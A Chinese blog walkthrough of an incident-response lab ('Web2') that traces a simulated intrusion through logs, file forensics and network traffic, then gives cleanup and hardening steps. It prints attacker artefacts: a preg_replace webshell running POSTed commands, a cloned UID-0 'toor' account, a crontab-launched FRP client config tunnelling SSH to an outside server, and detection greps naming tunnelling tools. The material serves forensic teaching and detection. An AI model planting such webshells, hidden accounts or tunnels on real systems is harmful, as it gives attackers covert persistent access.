Web2靶机实战:从入侵痕迹分析到应急响应全流程

发布时间:2026/10/2 14:02:36

Web2靶机实战:从入侵痕迹分析到应急响应全流程 1. 靶机环境与挑战概述Web2靶机是近年来安全圈内广受好评的应急响应实战平台模拟了企业级Linux服务器遭遇入侵后的典型场景。这个靶场最吸引人的地方在于它完整复现了攻击者从外网渗透到内网横向移动的全链条行为包含了Web漏洞利用、权限维持、内网穿透等企业安全事件中的高频攻击手法。我花了三天时间完整走通这个靶机发现其设计精妙之处在于攻击者不仅留下了webshell、隐藏账户等常见痕迹还通过FRP实现了内网穿透。整个溯源过程需要综合运用日志分析、文件取证、网络流量分析等多种技能非常贴近真实应急响应场景。2. 初始入侵痕迹分析2.1 Web日志关键线索提取首先检查/var/log/apache2/access.log通过以下命令快速定位异常请求cat access.log | grep -E union|select|eval|base64|system|exec --colorauto发现攻击者分三个阶段实施入侵通过/admin.php?id1尝试SQL注入使用/upload.php上传包含恶意代码的图片马访问/images/shell.php?cmdwhoami执行命令关键时间点取证技巧# 提取指定时间段的日志攻击发生在14:00-15:00 sed -n /14:00:00/,/15:00:00/p access.log attack_period.log # 统计高频访问IP awk {print $1} attack_period.log | sort | uniq -c | sort -nr2.2 后门文件定位与分析在/var/www/html/images目录发现可疑文件.config.php(Webshell)thumb.jpg(图片马实际是PHP脚本)使用file命令验证文件真实类型file thumb.jpg # 显示PHP script textWebshell特征分析?php preg_replace(/[page]/e,$_POST[cmd],saft); ?这是一种典型的preg_replace命令执行后门通过POST传递cmd参数执行系统命令。3. 系统级入侵痕迹排查3.1 用户账户异常检测常规检查可能漏掉克隆用户需要对比以下文件# 检查/etc/passwd与/etc/shadow的UID对应关系 awk -F: {print $1,$3} /etc/passwd /tmp/passwd_uids awk -F: {print $1,$3} /etc/shadow /tmp/shadow_uids diff /tmp/passwd_uids /tmp/shadow_uids # 查找UID为0的异常账户 awk -F: ($3 0) {print $1} /etc/passwd发现攻击者创建了克隆root用户合法root用户root:x:0:0:root:/root:/bin/bash克隆用户toor:x:0:0:root:/root:/bin/zsh3.2 计划任务与启动项检查在/etc/crontab中发现可疑任务*/5 * * * * root /usr/bin/frpc -c /etc/frp/frpc.ini /dev/null 21通过systemctl list-unit-files发现伪装服务systemctl list-unit-files | grep -i frp\|proxy\|tunnel4. 内网穿透行为溯源4.1 FRP配置文件分析在/etc/frp/frpc.ini中发现关键配置[common] server_addr 45.32.112.18 server_port 7000 token FrpTunn3l2023 [ssh] type tcp local_ip 127.0.0.1 local_port 22 remote_port 6000网络连接验证netstat -antp | grep frpc ss -antp | grep 60004.2 网络流量取证使用tcpdump抓取FRP通信流量tcpdump -i eth0 host 45.32.112.18 -w frp_traffic.pcap关键发现每5分钟建立一次TCP长连接数据传输使用TLS加密存在SSH隧道复用特征5. 完整攻击链重建根据取证结果还原攻击流程Web应用漏洞利用阶段SQL注入探测 → 文件上传漏洞 → Webshell植入攻击IP192.168.1.100可能为跳板机权限提升与持久化通过SUDO配置漏洞获取root创建克隆用户toor部署FRP客户端内网横向移动建立SSH反向隧道绕过防火墙限制维持长期控制通道6. 应急响应处置建议6.1 立即处置措施# 清除恶意进程 pkill frpc rm -f /usr/bin/frpc # 删除异常用户 userdel -r toor # 清理Webshell rm -f /var/www/html/images/{.config.php,thumb.jpg}6.2 系统加固方案文件完整性监控# 监控关键目录 apt install aide aideinit网络连接告警规则示例Suricataalert tcp any any - any any (msg:FRP Protocol Detected; content:|00 01 00|; depth:3; content:frpc; nocase; sid:1000001; rev:1;)用户行为审计增强# 启用auditd监控特权操作 auditctl -a always,exit -F archb64 -S execve -k root_cmd7. 防御体系优化思考这个案例暴露出三个典型问题应用层防护缺失未部署WAF导致简单SQL注入成功权限控制不严格SUDO配置不当导致提权网络监控盲区异常外连行为未被发现建议的防御矩阵graph TD A[边界防护] -- B[WAFIPS] B -- C[主机HIDS] C -- D[网络流量分析] D -- E[日志集中审计]实际工作中推荐采用ATTCK框架进行防御对标重点关注T1078有效账户T1098账户操纵T1572协议隧道最后分享一个实用命令合集用于快速排查类似事件# 用户排查 getent passwd | awk -F: $3 0 lastlog | grep -v Never # 进程排查 ps auxf | grep -E frp|ncat|socat|reGeorg lsof -i -P -n | grep ESTABLISHED # 文件排查 find / -name *.php -mtime -7 find / -type f -name .* -perm 0755
延伸阅读

更多相关文章

2026/9/28 6:25:17

认识数组(C语言)

//定义数组 //一种自定义类型,可以存储大量数据,便于一次调用多个变量 //形式 //type arr_name[]; //由type(数组元素类型),arr_name(数组名)以及[](规定数组大小)三部分组成//数组类…

2026/9/27 6:40:40

2026年中央供料设备选购指南,靠谱渠道这样找

行业痛点分析当前中央供料设备领域面临显著的技术升级挑战。传统开放式供料系统长期存在原料粉尘扩散、配比精度不足、有害气体挥发等问题,尤其在汽车内饰地毯等对洁净度要求严苛的生产场景中,这些问题直接导致产品不良率上升与环保合规风险。据行业调研…

2026/10/1 8:29:26

高效单位固定资产管理系统,从此账目永远清晰不再混乱

“账实不符、家底不清”,这八个字几乎是很多单位资产管理者的心头刺。大到机关单位、医院学校,小到集团公司,每年年终盘点时,面对堆积如山的Excel表格和参差不齐的台账数据,财务部门和后勤部门往往焦头烂额。固定资产管…

2026/10/2 13:58:37

Token命中率:LLM推理的“隐形加速器”

一、Token命中率到底是什么?1.1 从KV Cache说起LLM以自回归方式生成文本:每生成一个新Token,都需要“回头看”前面所有Token的Key和Value张量来计算注意力。如果每次生成都重新计算全部历史Token的K/V,计算量会随序列长度线性增长…

2026/10/2 13:58:37

(132页PPT)精益生产现场管理和改善(附下载方式)

篇幅所限,本文只提供部分资料内容,完整资料请看下面链接 https://download.csdn.net/download/AI_data_cloud/88338604 资料解读:精益生产现场管理和改善 详细资料请看本解读文章的最后内容。 这份精益生产现场管理与改善的专业资料&#…

2026/10/2 13:53:36

【第2 章】WorkBuddy 从入门到高手

WorkBuddy 从入门到高手(第 2章):核心能力,办公六件套全拆解(超详细案例版) 这是一套面向「完全没用过 WorkBuddy」读者的系统学习路线,总共 7 章。本文是第 3 章。 系列目录:第 0 章…

2026/10/2 8:16:46

东莞市品牌网站建设报价常见报错与解决

东莞品牌网站建设报价单背后:一份保姆级建站教程避坑实录 网站做好了没人访问,这大概是很多老板最头疼的事。花了大几万做的品牌站,上线后流量惨淡,比路边摊还冷清。别急着骂外包公司,很多“东莞品牌网站建设报价”里藏着不少猫腻,比如用模板站冒充定制…

2026/10/1 17:09:46

如何划分训练/验证集:Spirula Studio五种eval_mode策略详解

如何划分训练/验证集:Spirula Studio五种eval_mode策略详解 【免费下载链接】spirula-studio Cross-vendor 3D Gaussian Splatting trainer - video to splat to mesh, Vulkan or CUDA. 项目地址: https://gitcode.com/GitHub_Trending/sp/spirula-studio Sp…

2026/10/1 10:48:55

SEO怎么推广速查手册新手避坑实战指南

SEO怎么推广速查手册新手避坑实战指南 模板网站太丑不够用?别急着加滤镜,那是治标不治本。很多老板盯着后台流量掉得眼红,却还在纠结首页Banner的圆角是不是3像素。这就像穿着西装去挖土,姿势不对,努力白费。我整理这份 速查手册…

2026/10/2 0:02:57

PWN入门:从栈溢出原理到ROP链实战

1. 这不是“学PWN”,是重新理解你每天敲的每一行C代码我第一次在CTF赛场上写出能控制程序流的exp时,手抖得连gdb的c命令都输错三次。那道题只有23行C代码,一个gets()调用,一个printf(),一个return——它甚至没开NX&…

2026/10/2 0:02:57

Windows下cudaMallocHost显存占用之谜:WDDM与TCC模式差异及优化方案

1. 一个反直觉的显存占用现象第一次在 Windows 上看到cudaMallocHost把显存吃掉的时候,我的反应是打开任务管理器反复确认了三遍。明明调用的是主机端锁页内存分配,按 CUDA 文档的说法,这块内存应该落在系统 RAM 里,跟 GPU 的显存…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
☎咨询二维码 ☎ ↑